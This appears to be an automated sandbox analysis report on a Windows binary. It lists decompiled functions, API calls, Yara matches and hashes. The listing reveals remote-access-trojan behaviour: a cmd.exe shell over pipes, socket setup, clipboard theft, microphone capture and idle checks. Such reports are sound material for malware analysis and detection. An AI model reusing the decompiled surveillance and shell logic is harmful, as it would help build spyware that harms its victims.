                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                                                                • String ID: KeepAlive Disabled!$[WARNING]
                                                                                • API String ID: 2944585167-3856563802
                                                                                • Opcode ID: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                                                                • Instruction ID: a30e930004435671851b5eafd83b9c9ec9f6d71b75df5e3fdd77de3efe23ec90
                                                                                • Opcode Fuzzy Hash: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                                                                • Instruction Fuzzy Hash: F3F027705103187FEB10B729C94EBEE7F8C8742354F40006AEC11532C1E6F9A9C486EA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                                                                • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                                                                • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                                                                  • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                                                                Strings
                                                                                • invalid vector<T> subscript, xrefs: 004018A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                                                                • String ID: invalid vector<T> subscript
                                                                                • API String ID: 1986322901-3016609489
                                                                                • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                                                                • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                                                                • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                                                                • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
                                                                                • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                                                                • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                                                                Strings
                                                                                • invalid vector<T> subscript, xrefs: 00405019
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                                                                • String ID: invalid vector<T> subscript
                                                                                • API String ID: 3609083747-3016609489
                                                                                • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                                                                • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                                                                • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                                                                • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00412019() {
                                                                                				_Unknown_base(*)()* _t2;
                                                                                
                                                                                				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                                                                                				 *0x41c1dc = _t2;
                                                                                				return _t2;
                                                                                			}





                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                • API String ID: 2574300362-1519888992
                                                                                • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                                                                • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                                                                • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                                                                • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040F4AE() {
                                                                                				_Unknown_base(*)()* _t2;
                                                                                
                                                                                				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
                                                                                				 *0x41bf1c = _t2;
                                                                                				return _t2;
                                                                                			}





                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetCursorInfo$User32.dll
                                                                                • API String ID: 1646373207-2714051624
                                                                                • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                                                                • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                                                                • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                                                                • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00413AED() {
                                                                                				_Unknown_base(*)()* _t2;
                                                                                
                                                                                				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                                                                                				 *0x41c1f8 = _t2;
                                                                                				return _t2;
                                                                                			}




                                                                                0x00413b03
                                                                                0x00413b09
                                                                                0x00413b0e

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetConsoleWindow$kernel32.dll
                                                                                • API String ID: 2574300362-100875112
                                                                                • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                                                                • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                                                                • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                                                                • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
                                                                                				int _v8;
                                                                                				int _v12;
                                                                                				char* _t31;
                                                                                				signed int _t36;
                                                                                				signed int _t37;
                                                                                				void* _t46;
                                                                                
                                                                                				_v8 = 0;
                                                                                				_t31 = 0x415664;
                                                                                				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
                                                                                					_t31 = malloc(_v8);
                                                                                					_t36 = _v8;
                                                                                					_t46 = _t31;
                                                                                					_t37 = _t36 >> 2;
                                                                                					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
                                                                                					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
                                                                                				}
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
                                                                                				return _a4;
                                                                                			}










                                                                                APIs
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                                                                • malloc.MSVCRT ref: 0040B64B
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                                                                • String ID:
                                                                                • API String ID: 3506253819-0
                                                                                • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                                                                • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                                                                • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                                                                • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                                                                  • Part of subcall function 00402038: #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@
                                                                                • String ID:
                                                                                • API String ID: 3852086675-0
                                                                                • Opcode ID: 83aad247175ce399ea9e14f93eae6aa15783594a462698d047ee4c7974368ae1
                                                                                • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                                                                • Opcode Fuzzy Hash: 83aad247175ce399ea9e14f93eae6aa15783594a462698d047ee4c7974368ae1
                                                                                • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00401181(void* __eflags, signed int _a4) {
                                                                                				intOrPtr _t16;
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr _t19;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr _t28;
                                                                                				intOrPtr _t29;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr _t31;
                                                                                				intOrPtr _t32;
                                                                                				intOrPtr _t33;
                                                                                				signed int _t36;
                                                                                
                                                                                				_t38 = __eflags;
                                                                                				E0040180C(0x41b200, __eflags, _a4);
                                                                                				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
                                                                                				_t36 = _a4 << 5;
                                                                                				_t16 = E0040180C(0x41b200, _t38, _a4);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t28 =  *0x41b1dc; // 0x0
                                                                                				 *((intOrPtr*)(_t36 + _t28)) = _t16;
                                                                                				_t17 =  *0x41b1dc; // 0x0
                                                                                				_t29 =  *0x41b1d4; // 0x0
                                                                                				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
                                                                                				_t30 =  *0x41b1dc; // 0x0
                                                                                				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
                                                                                				_t31 =  *0x41b1dc; // 0x0
                                                                                				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
                                                                                				_t32 =  *0x41b1dc; // 0x0
                                                                                				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
                                                                                				_t33 =  *0x41b1dc; // 0x0
                                                                                				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
                                                                                				_t19 =  *0x41b1dc; // 0x0
                                                                                				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
                                                                                				_t22 =  *0x41b1dc; // 0x0
                                                                                				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
                                                                                			}















                                                                                APIs
                                                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                                                                • waveInPrepareHeader.WINMM(00000000,00000020,?,?,0040116A,00000000), ref: 0040120D
                                                                                • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                                                                • String ID:
                                                                                • API String ID: 1952094867-0
                                                                                • Opcode ID: 24a45407b9a895f56b61697f3f12604cdeae615d42fa41337b1c513b769c6b25
                                                                                • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                                                                • Opcode Fuzzy Hash: 24a45407b9a895f56b61697f3f12604cdeae615d42fa41337b1c513b769c6b25
                                                                                • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00409B39,000197E8), ref: 00412B5E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleV?$allocator@$??0?$basic_string@G@1@@G@2@@std@@G@std@@OpenProcessU?$char_traits@
                                                                                • String ID:
                                                                                • API String ID: 284624841-0
                                                                                • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                                                                • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                                                                • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                                                                • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 18%
                                                                                			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
                                                                                				int _v8;
                                                                                				char _v2056;
                                                                                
                                                                                				_v8 = 0x400;
                                                                                				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
                                                                                					_push( &_a15);
                                                                                					_push(0x415800);
                                                                                				} else {
                                                                                					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
                                                                                					RegCloseKey(_a8);
                                                                                					_push( &_a15);
                                                                                					_push( &_v2056);
                                                                                				}
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
                                                                                				return _a4;
                                                                                			}






                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                                                                • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                                                                • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                                                                • String ID:
                                                                                • API String ID: 4081865614-0
                                                                                • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                                                                • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                                                                • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                                                                • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E0040D87E() {
                                                                                				char _t9;
                                                                                				void* _t22;
                                                                                				void* _t28;
                                                                                				intOrPtr _t29;
                                                                                
                                                                                				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
                                                                                				_t29 =  *0x41b889; // 0x0
                                                                                				if(_t29 == 0) {
                                                                                					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                					E00402B8A(_t9);
                                                                                				}
                                                                                				E004017DD(_t22 - 0x10);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}








                                                                                APIs
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                                                                  • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                                                                  • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                                                                  • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                                                                  • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                                                                  • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                                                                  • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                                                                  • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                                                                  • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                                                                  • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                                                                  • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                                                                • String ID:
                                                                                • API String ID: 187635395-0
                                                                                • Opcode ID: 3d5a2c9a913f0a26f94001448af1abd8968a4c9c09541a6a69092f469a409126
                                                                                • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                                                                • Opcode Fuzzy Hash: 3d5a2c9a913f0a26f94001448af1abd8968a4c9c09541a6a69092f469a409126
                                                                                • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 27%
                                                                                			E00406BEF(void* __ecx, intOrPtr _a4) {
                                                                                				char _v5;
                                                                                				void* _t15;
                                                                                
                                                                                				if(OpenClipboard(0) == 0) {
                                                                                					L3:
                                                                                					_push( &_v5);
                                                                                					_push(0x415664);
                                                                                				} else {
                                                                                					_t15 = GetClipboardData(1);
                                                                                					CloseClipboard();
                                                                                					if(_t15 == 0) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						_push( &_v5);
                                                                                						_push(_t15);
                                                                                					}
                                                                                				}
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                                                                				return _a4;
                                                                                			}






                                                                                APIs
                                                                                • OpenClipboard.USER32(00000000), ref: 00406BF6
                                                                                • GetClipboardData.USER32 ref: 00406C02
                                                                                • CloseClipboard.USER32(?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C0A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C27
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
